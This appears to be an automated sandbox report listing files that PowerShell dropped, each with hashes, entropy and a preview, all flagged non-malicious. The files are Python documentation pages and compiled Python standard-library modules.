                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (830), with CRLF line terminators
                              Category:dropped
                              Size (bytes):332017
                              Entropy (8bit):4.974710633364434
                              Encrypted:false
                              SSDEEP:6144:/7c0Mn/3Lf0D2JOSch3FX6TX1yKHcMLdL2WadB0fLsGNk7dvg:/S0HqlRXk7dvg
                              MD5:887FCC9C06C7D464253ABCEE623BFC66
                              SHA1:95603FD497D7B7512EA66C9F70DD6E504D19787B
                              SHA-256:4C4AD19F1323F16D488199E62F09F304792C55B0BA7E2394B5578D9D615BF532
                              SHA-512:E0A2D1F8E3D684CB6FFF32C25472B5A45EE8870219D746ED58AADE4BF13CD1774EF5B5ADE71A191FC47026E8F73960C8CE24EB1960EAB087DCA1B7EACB6D710A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New In Python 3.5" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/3.5.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Editors, Elvis Pranskevichus < elvis@magic.io>, Yury Selivanov < yury@magic.io>,. This article explains the new features in Python 3.5, compared to 3.4. Python 3.5 was released on September 13, 201..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Editors, Elvis Pranskevichus < elvis@magic.io>, Yury Seli
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (589), with CRLF line terminators
                              Category:dropped
                              Size (bytes):308262
                              Entropy (8bit):4.983642401679006
                              Encrypted:false
                              SSDEEP:6144:z3E6X6SGEPvtOJRv72r4sDyZt4RjLgxptg:vLmg
                              MD5:B55B4C5B3B52E3E6FE10A5A1D18336B0
                              SHA1:0946B865963FC613D68ED852070BAA5A621E0FD1
                              SHA-256:FA5C050A8187273C7719EA072047ED225A8CA60BA244AB485933F65F4AA696CA
                              SHA-512:847561F0D47169D202C39D093A89CB24986FA636165642E685438C89F4EA41C690AB8B82E57B13C7FDBAEACA8FA6A52039C2A5A1383C3FD09121E93909CD3045
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New In Python 3.6" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/3.6.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Editors, Elvis Pranskevichus < elvis@magic.io>, Yury Selivanov < yury@magic.io>,. This article explains the new features in Python 3.6, compared to 3.5. Python 3.6 was released on December 23, 2016..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Editors, Elvis Pranskevichus < elvis@magic.io>, Yury Seli
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (598), with CRLF line terminators
                              Category:dropped
                              Size (bytes):322301
                              Entropy (8bit):4.996168099313293
                              Encrypted:false
                              SSDEEP:1536:YqyhdQMtSTL61t8/ecNfV8T4DcVySck8tP4o5GuAGIsHVACoKULXmouA/i3EkwwN:ehS/fZc/8tA6GI11IuA/i3Ekw2Ri+Xyg
                              MD5:A5B83E023AB963237CEF7CE1D637F958
                              SHA1:6867A4E2DEFCD4E594AE760844EE412841A3961F
                              SHA-256:645A5CE90C2A403C0983657EE116C5909BED4EBEB2DFE9951B46B46C4F8B9BC8
                              SHA-512:6CB9E2CA993BDC6B3BB27E5F45A29E443851B8D733324BD827E2599A90AFAA3AB149A69CD5B348EC1F08562FF04F8011C97243500DEDF39E82E0CE81E43A7C8A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New In Python 3.7" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/3.7.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Editor, Elvis Pranskevichus < elvis@magic.io>,. This article explains the new features in Python 3.7, compared to 3.6. Python 3.7 was released on June 27, 2018. For full details, see the changelog...." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Editor, Elvis Pranskevichus < elvis@magic.io>,. This arti
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (736), with CRLF line terminators
                              Category:dropped
                              Size (bytes):314923
                              Entropy (8bit):4.979869168049033
                              Encrypted:false
                              SSDEEP:3072:nQxXdrzzhf5EiBNAdPVHlRNnPzj2BQcTg:CXphf5EK2PdNnu5g
                              MD5:4E245B6B8CF9DFB48F32B90EBC7F506F
                              SHA1:5C1C916683F497A344F36D704B045D64B2B21B1F
                              SHA-256:FE05E9BE1D68AB45E267A97246E8B912CF7EBAAA7F16A1BA297541C2D4071322
                              SHA-512:9B9D49F70257F9F30E412F3AE39B9016314017D3E8868861360F7F3A4292C00003C0B633CC17D7C167FE097F477A5724D26FAD131C0426E95C9FDC2F0A38AD42
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New In Python 3.8" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/3.8.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Editor, Raymond Hettinger,. This article explains the new features in Python 3.8, compared to 3.7. Python 3.8 was released on October 14, 2019. For full details, see the changelog. Summary . Releas..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Editor, Raymond Hettinger,. This article explains the n
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (977), with CRLF line terminators
                              Category:dropped
                              Size (bytes):223266
                              Entropy (8bit):5.01056811614268
                              Encrypted:false
                              SSDEEP:3072:lTujWbCJaS56oCmSAtsW5nAEsfGRgSpvSLYsOg:8jWbCJh6ofSAd5nqGRgSVSLog
                              MD5:6C226F6CBFC0E555DF0D711C66DB62E8
                              SHA1:CA23583BA414596764860FBEFA5388FF88608BE3
                              SHA-256:33C0BD45ACEA9CC1D653CEAD89ABC0BF9B494121403FC16822BC38CED7DF8AEB
                              SHA-512:34D55DBF1090E802BEECFBEB616625F5259496E941982FDAD48770C078F9AAF5DB474AA52555377A3BAC5D5D1BA2CED4F265AF32DB59FE00E9DF0A5C88EE6410
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New In Python 3.9" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/3.9.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Editor, .ukasz Langa,. This article explains the new features in Python 3.9, compared to 3.8. Python 3.9 was released on October 5, 2020. For full details, see the changelog. Summary . Release high..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Editor, .ukasz Langa,. This article explains the new
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):12569
                              Entropy (8bit):4.815381710828109
                              Encrypted:false
                              SSDEEP:192:W7rtoKHqkX1vsMfMg/nzTMbTiM765nPTMbiA76dqEC:8HqklZr/nzTMrG5nPTMh76dqEC
                              MD5:F61D0A80CD635E6575F1CD7EE48DF54F
                              SHA1:283E32277723D8BEB1DB4DEDB22C15F992D1639D
                              SHA-256:95F72D5A416F99312F166AE2111EF5804A5420F952924F48F879742087B15887
                              SHA-512:A1AFB242ACDBC501536C3E8C05614CC86AC4BFC47DBC6BAF03993DA42B78B0F0945D74AC9F32F30B755BBF0F363B6D0F208192274AE5D6BFC8EC3E96E9A72860
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Changelog" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/changelog.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The NEWS file is not available." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The NEWS file is not available." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Changelog &#8212; Python 3.12.3 documen
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):61560
                              Entropy (8bit):4.999311631462388
                              Encrypted:false
                              SSDEEP:384:wHqkldx/n9TMuV/sckTFTZnwbTTZcThTLThTRTTdKTeTATKTgT+TQTwWTmenTjTr:kqydhpMwREJpIiPOf7fawlMy764N
                              MD5:D9200E2BBD189E0DAEC2CEBFD340A4C1
                              SHA1:05DE5B7DBA067C1DECD258B7817CB421DDAC2115
                              SHA-256:27227695C217FD7686585894C89B79C4837DBD0A8F9EC63F77CDF83EB29BDD60
                              SHA-512:D400B77970EE83CEFA4FC1272427514AF58D1BDB793DE1585D5CA396D4C46F4B3EBD5863CC8B32F120529B459663AA07D679E5F7296C7B21D697B3358511C67A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="What.s New in Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/whatsnew/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The .What.s New in Python. series of essays takes tours through the most important changes between major Python versions. They are a .must read. for anyone wishing to stay up-to-date after a new re..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The .What.s New in Python. series of essays
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):41639
                              Entropy (8bit):5.641577109892401
                              Encrypted:false
                              SSDEEP:768:6BvmLMDaSMxhWy7BjHwRsWR/Aw7u6X7cF6+e/26WES+8JBl5IPi3w:6BvmLGu3WRD77Ms26WEKlaPKw
                              MD5:6B7B35EE5AE66FA828D0606B8E80293D
                              SHA1:BC890AD6AEDFE485997EB9BCB85CBE90A9457599
                              SHA-256:49499A22470FE3590A48C5501A7307D177CC0BB01B72056B3BE306107D3548E8
                              SHA-512:6269A2B89D73D308E71A6B7C97A0EC4CD33A542C288B8593D4CC1041B24185CA6F7488166C9B5C9997311DCB54228C930B1371F4EBAD19F523101ADFC6A70A3B
                              Malicious:false
                              Preview:.........U.f................................d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.d.d.d.d.d.d.d.d.d...Z.d...Z.dGd...Z.dHd...Z.....dId...Z...d.d.l.Z.d...Z.g.d...Z.g.d...Z.d...Z.d...Z.d...Z.dJd...Z.d...Z.dKd...Z.d...Z.dLd...Z.d...Z.d...Z.dHd ..Z.d!..Z.dHd"..Z.d#d$d%d...Z e.jB..................d.d.f.d&..Z"d'..Z#..G.d(..d)........Z$d*..Z%..G.d+..d,..e.jL..................d-d.................Z'd.a(d/..Z)d0..Z*d1..Z+d2..Z,d3..Z-d4..Z.d5..Z/i.Z0dMd6..Z1d7..Z2d8..Z3d9..Z4d:..Z5d;..Z6d<..Z7d=..Z8i.Z9dNd>..Z:d?Z;d.a<d@..Z=dA..Z>e?dBk(..r^dCe.j...................v.x.s...dDe.j...................v.ZAdEe.j...................v.x.r...dFe.j...................v.ZB..eC..e:eBeA....................e.j...................d...........y.y.#.e.$.r...d...Z.Y....(w.x.Y.w.)Oa7... This module tries to retrieve as much platform-identifying data as. possible. It makes this information available via function APIs... If called from the command line, it prints the platform. information
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):41109
                              Entropy (8bit):4.951422013670653
                              Encrypted:false
                              SSDEEP:768:RD8uTM8SBpe6/3b8pS96MFeT/SRvJ7NBwwSCNugmpL:GuTMHr889HwT/vmqpL
                              MD5:DDB2F304D2A94AED727C65E700F73900
                              SHA1:A11623A599574C9A29467AC349147B3C0CA3E3BF
                              SHA-256:7D6693797FEE1215C6D9B69F0210CA7E8BC6FB44C7F3500BB82C451493FBDDCA
                              SHA-512:BFEAE69FE07C4A0D0B7BB3D930569E96FD5BC3FAFD6340CFB15316581C0937C0BCFF3423992B10FD8B5E46817974E1A52EE27F98F4D0194B0603B2AD0C32893B
                              Malicious:false
                              Preview:.........U.fEr.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................d.d.e...........Z...e.........j%..................e.j&..............................G.d...d.........Z.d.Z...e.j,..................d.........Z.d1d...Z.d...Z...e.j,..................d.e.j4..........................Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.........Z ..G.d...d.e ........Z!d...Z"..G.d...d.e#........Z$d.d.d.d.d ..Z%..e&........Z'..G.d!..d"........Z(d#..Z)e*e+e,e.j...................e-f.Z...G.d$..d%e&........Z/d&..Z0e1..e2e"e.e!.'........e3..e2e0e(e/.'........i.Z4d.e2d(..d)..Z5d.e2d(..d*..Z6e1d+d,d-..d...Z7e1d,d+d/..d0..Z8y.)2a>...plistlib.py -- a tool to generate and parse MacOSX .plist files...The property list (.plist) file format is a simple XML pickle supporting.basic object types, like dictionaries, lists, numbers and strings..Usually the top level object is a dictionary...To write out a plist fil
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29513
                              Entropy (8bit):5.137338905784011
                              Encrypted:false
                              SSDEEP:768:V64Gm7+w17UAKJzrXGpZBVkPzWubPPo8kYX:V6Xmyw17UpJzrX4ZszWubPPogX
                              MD5:944BF6A803B2E61D5A5017A91E2B1E6F
                              SHA1:8E078D8C5DE2A21196D4D612EF1C3DF5F7218C0D
                              SHA-256:C15B8E2C25EEDFA6ABE5868C48EF05CFCBEDF347463D0825AC361E0A3FFEE956
                              SHA-512:D072DCAFA5EF5ACA621C2AC0935C9B1036645B24117B6C0325878D98035BE5BEC43636C18522AE47AE90EC58C08F7618F407FB952FC9B5986E2253492C27675E
                              Malicious:false
                              Preview:.........U.f.`..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.d.d.d.d...d...Z.d.d.d.d.d...d...Z.d.d...d...Z.d...Z.d...Z.d...Z...G.d...d.........Z.d...Z...G.d...d.........Z...e.e.e.e.e.e.e...e.d.........h.........Z.d...Z d...Z!y.).a/...Support to pretty-print lists, tuples, & dictionaries recursively...Very simple, but useful, especially in debugging data structures...Classes.-------..PrettyPrinter(). Handle pretty-printing operations onto a stream using a configured. set of formatting parameters...Functions.---------..pformat(). Format a Python object into a pretty-printed representation...pprint(). Pretty-print a Python object to a stream [default is sys.stdout]...saferepr(). Generate a 'standard' repr()-like value, but protect against recursive. data structures........N)...StringIO)...pprint..pformat..isreadable..isrecursive..saferepr..PrettyPrinter..ppFT....compact..sort_dicts..underscore_numbersc.....................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):10069
                              Entropy (8bit):5.385954664559388
                              Encrypted:false
                              SSDEEP:96:rhx/s9BT6uEtYMbttYcj1/+VlHt/HmLEF14BKTj4CgKwj6ygFcm5KQSWKe6Al3Wb:tF2ouTKYcellmIH4c8DgFU7WKgxaSy5x
                              MD5:57E92FF30A85719137AA0C9414E5150F
                              SHA1:9506E18758AC017E6425031E1D4499E3C5C08B29
                              SHA-256:357A50FD0A59BE160D801E7ED35F4AA8904C0F941B60997550B7210FCFA52231
                              SHA-512:9E508581A74ACCAA6A5A49C9479F840F145B6F9D234571A9364EF0CED17B70920877389EAB411C5BEADF15FF7181144572007CE13B6D14CDD3C22FE5EBBEC1AC
                              Malicious:false
                              Preview:.........U.fq...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z...G.d...d.e.........Z...G.d...d.e.j...........................Z.d...Z.....d.d...Z.d...Z.e.d.k(..r...e...........y.y.).zqRoutine to "compile" a .py file to a .pyc file...This module has intimate knowledge of the format of .pyc files.......N)...compile..main..PyCompileError..PycInvalidationModec...........................e.Z.d.Z.d.Z.d.d...Z.d...Z.y.).r....a....Exception raised when an error occurs while attempting to. compile the file... To raise this exception, use.. raise PyCompileError(exc_type,exc_value,file[,msg]).. where.. exc_type: exception type to be used in error message. type name can be accesses as class variable. 'exc_type_name'.. exc_value: exception value to be used in error message. can be accesses as class variable 'exc_value'.. file: name of file bein
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14771
                              Entropy (8bit):5.046199687123002
                              Encrypted:false
                              SSDEEP:384:imHzd5iWP9PtFPBkBBb6LRyp9lGPXzhP+YqFAocC5wjxbY6Q:7lPBkBV6LRxcYq+WR6Q
                              MD5:86752889C22D41A9B2B92CCBA9734559
                              SHA1:385F5B2B4F1A4CE647F932FE7515A04C19289438
                              SHA-256:EB082CF568E28FD4CBAB2478ACC6F8D32BBE29A09781E5481ADC28960F436B42
                              SHA-512:C9548E9661029698B4B04D6901AD4937BE96EA54F10F7ECFA9A38FCB9333DC598C7A8B5E326D73462904F7E874EAC96646C89A9A88462D9C810244B8F6F42E9A
                              Malicious:false
                              Preview:.........U.f................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....d.d.l.m.Z...g.d...Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.........Z.e...e.Z.y.y.#.e.$.r...d.Z.Y..Ow.x.Y.w.#.e.$.r.....G.d...d.e.........Z.Y..Zw.x.Y.w.).z'A multi-producer, multi-consumer queue......N)...deque)...heappush..heappop)...monotonic)...SimpleQueue)...Empty..Full..Queue..PriorityQueue..LifoQueuer....).r....c...........................e.Z.d.Z.d.Z.y.).r....z4Exception raised by Queue.get(block=0)/get_nowait().N....__name__..__module__..__qualname__..__doc__........CC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\queue.pyr....r........s........>...r....r....c...........................e.Z.d.Z.d.Z.y.).r....z4Exception raised by Queue.put(block=0)/put_nowait().Nr....r....r....r....r....r........s........:...r....r....c..........................e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9362
                              Entropy (8bit):5.4987310955457795
                              Encrypted:false
                              SSDEEP:96:7RfxXxWo/v10E4woAcsKTP0nf5njlH3rZaLyS10IbiEdw9CON3E+N8U1hwRAI3Dy:lrWo/v2cLPxjlX0f1ON3ENMAmVXaaD
                              MD5:CAD22D841D9873FBDEB96F49F02460E7
                              SHA1:EBBB73D61CB3F1B02045EA12A8504E5666199DF1
                              SHA-256:3EA8D42E187C6DA14F8BA68D170D8BAB4EB07B8B1965F3A138531D768711618C
                              SHA-512:937FF7ABC0ACF02A0B2D3194508E74C3080E88565548E939CF5188EF04873002D03C0057192BF9C20CC316C832CD7CFFC71A8FBBC47F669146C256B8A1639368
                              Malicious:false
                              Preview:.........U.f...............................d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z...d.d.l.m.Z.m.Z...d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.e.d.k(..r...e...........y.y.#.e.$.r...d.Z.d.Z.Y..8w.x.Y.w.).zHConversions to/from quoted-printable transport encoding as per RFC 1521.)...encode..decode..encodestring..decodestring.....=.L...s....0123456789ABCDEF..........)...a2b_qp..b2a_qpNc.....................x.....t.........|.t.................s.J...|.d.v.r.|.S.|.d.k(..r.|.S.|.t.........k(..x.s...d.|.c.x.k...x.r...d.k...n.c.....S.).z.Decide whether a particular byte ordinal needs to be quoted... The 'quotetabs' flag indicates whether embedded tabs and spaces should be. quoted. Note that line-ending tabs and spaces are always encoded, as per. RFC 1521.. ..... ......_..... .....~)...isinstance..bytes..ESCAPE)...c..quotetabs..headers.... .DC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\quopri.py..needsquotingr........sI...........a...............F.{..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):33192
                              Entropy (8bit):5.572580468747224
                              Encrypted:false
                              SSDEEP:768:CD1f6zcI7qWHEOE3X5Es7HPzjnANehfAscJSNxT7:efWc54EF3XrPX5xT7
                              MD5:D9E556FAE4D748198E4F2B46EEA99E6F
                              SHA1:B2E06CC8804982B3DD8CE813979BC9BDAE4797F0
                              SHA-256:75731168F52A314631D7067F800AB9978FB64109B57FD184D947714781D62809
                              SHA-512:A51BB90FB7E746566938257BF00A4F9599C0095E82EE0355A1FB09E506589809D28B34A4259FFB6CECAE55EF6FB5DC5CF23C8034C664D9DEB82A016E9543CEE6
                              Malicious:false
                              Preview:.........U.f_.........................^.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z m!Z"..d.d.l#m$Z%..d.d.l&m'Z(..d.d.l)m*Z+..d.d.l,m-Z.m/Z0..d.d.l1m1Z2..d.d.l#Z3d.d.l4Z4..d.d.l5m6Z7..g.d...Z:d...e.d.........z.....e.d.........z...Z;..e.d.........Z<d...e.d.........z...Z=d.Z>d.e>..z...Z?d.Z@..G.d...d.e4j...........................ZA..G.d...d.eA........ZB..eA........ZCeCj...................ZDeCj...................ZEeCj...................ZFeCj...................ZGeCj...................ZHeCj...................ZIeCj...................ZJeCj...................ZKeCj...................ZLeCj...................ZMeCj...................ZNeCj...................ZOeCj...................ZPeCj...................ZQeCj...................ZReCj...................ZSeCj...................ZTeCj...................ZUeCj...................ZVeCj...................ZWeCj...................ZXeCj...................ZYeCj...................ZZeCj...............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9948
                              Entropy (8bit):5.087810637636256
                              Encrypted:false
                              SSDEEP:192:R33MiS32FL7hrGcb2AFCbxlf/u//jxEAuWcWX8wd:RRBFL7hrG+Vi/u/rxERDWX8wd
                              MD5:7BE37E702CFE628D2FF7EE74CEF7B3AD
                              SHA1:E21CE6657E561806C8E1155486B97AE3BBEBA3FB
                              SHA-256:6924A3B72DEA632FB8FCE937E42259894262B13AA3F044C825C95CF942EE35AA
                              SHA-512:BB0D7162FD65F640193B2C5164CB2E3C81A196C885B6A448CF8D3E0CE6769C1E052AD7BDE89DEC89C9C1CE0998535DBEEBCA321749F293F4A37E8A6C3C9603D3
                              Malicious:false
                              Preview:.........U.fj.........................x.....d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z...G.d...d.........Z.d...Z...e.........Z.e.j...................Z.y.).zGRedo the builtin repr() (representation) but with limits on most sizes.)...Repr..repr..recursive_repr.....N)...islice)...get_identc...............................f.d...}.|.S.).zGDecorator to make a repr function return fillvalue for a recursive callc.................................t.........................f.d...}.t...........d.........|._.........t...........d.........|._.........t...........d.........|._.........t...........d.........|._.........t...........d.i.........|._.........t...........d.d.........|._.........|.S.).Nc.............................t.........|.........t.................f.}.|...v.r...S...j...................|.................|.........}...j...................|...........|.S.#...j...................|...........w.x.Y.w...N)...idr......add..discard)...self..key..result..fillvalue..repr_running..user_fun
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8321
                              Entropy (8bit):5.5158890865366015
                              Encrypted:false
                              SSDEEP:192:Uro3kRIVxr9JGD+4G5+WUMhKAN237Pe4WPSQVdlsEIeGPGYF:8UkRl4+WUMIP3F
                              MD5:C10A27B6D8A28ED28D4824244C9608C3
                              SHA1:0D1606401CCF9E6463D31E932CC3DA7B4B5CD75D
                              SHA-256:4C60D8AFB4D20635AA312DF544E5680B2CDC87041450DD424ED7809B00720AE6
                              SHA-512:4307FCA5BBBB2349C2CE01CF31A110A54EF15CEB51FA88D4EE390FB48C32C113FBB638BA4EA83D2096C83503ADF95A3E053C71BC372C9C25E74795D21B2E81D9
                              Malicious:false
                              Preview:.........U.fn...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.g.Z...G.d...d.........Z.d...Z...d.d.l.Z...e.j.....................e.........j...............................e.j...................d.............d.Z.y.#.e.$.r...d.Z.Y.y.w.x.Y.w.).a1...Word completion for GNU readline...The completer completes keywords, built-ins and globals in a selectable.namespace (which defaults to __main__); when completing NAME.NAME..., it.evaluates (!) the expression up to the last dot and completes its attributes...It's very cool to do "import sys" type "sys.", hit the completion key (twice),.and see the list of names defined by the sys module!..Tip: to use the tab key as the completion key, call.. readline.parse_and_bind("tab: complete")..Notes:..- Exceptions raised by the completer function are *ignored* (and generally cause. the completion to fail). This is a feature -- since readline sets the tty. device in raw (or cbreak) mode, printing a traceback wouldn'
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):26167
                              Entropy (8bit):5.119765570524165
                              Encrypted:false
                              SSDEEP:768:yQFiSw/ZDJea+Q6uBWP22s7Y5KRCzkh08W+/fRl7:ZFa/xsa+w7Y8h0IZl7
                              MD5:609E9A37A477973C8E89858097C0E67B
                              SHA1:F4C6F4AC2670E054DC4D7CA988B6D1E4D2F9D6B8
                              SHA-256:E4ADE05216FA0BDA3A63A2ABF015EFDD34CAFD736C1ADFB791928348706A4750
                              SHA-512:A0B8B4EEE2929DB1E6F3E64EC57DB064BB4948568ACE75DC4C5C742356AD2107BFB03579148777CA084F52BD3C62EF9C690666B17496273CEE9A392310C17C86
                              Malicious:false
                              Preview:.........U.fFO........................t.....d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d...Z...e.d.g.d...........Z.d.e._.........d.e.j..................._.........d.e.j .................._.........d.e.j".................._.........d.e.j$.................._...........G.d...d.e.........Z...G.d...d.e...........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...e.e.d.........r...G.d...d.e.........Z...e.e.d.........r...G.d...d e.........Z...e.e.d!........r...G.d"..d#e.........Z...e.e.d$........r...G.d%..d&e.........Z.d'..Z...e.d$........r.e.Z.y...e.d.........r.e.Z.y...e.d!........r.e.Z.y...e.d.........r.e.Z.y.e.Z.y.)(z|Selectors module...This module allows high-level and efficient I/O multiplexing, built upon the.`select` module primitives.......)...ABCMeta..abstractmethod)...namedtuple)...MappingN..........c...........................t.........|.t.................r.|.}.n...t.........|.j...................................}.|.d.k...r.t.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14201
                              Entropy (8bit):5.013427494839898
                              Encrypted:false
                              SSDEEP:192:ZbFsgtt3t2s6GmRPNDImZniShWYLtgu6bwpByEWsj1:Xsgt1v6GsPtImZiSh5Lth3by4
                              MD5:97A9B9491776A141D239EA758F79BC0F
                              SHA1:29DD89344C86C6E49F0D9FA79D538F2B9BE28243
                              SHA-256:06E48ED817CDAE63931299DA97FD5BECF223D19F32976D50E46ABEFC42CCC823
                              SHA-512:0678D135AA191B5F74F446C2A04D6304BE5D9C77049040B8F8894CBBB2178FF9E1FAC63EE7F6AEE2DFAC10BA9DE827C903774D7AFCE56CEB5E044E2E8453F1F1
                              Malicious:false
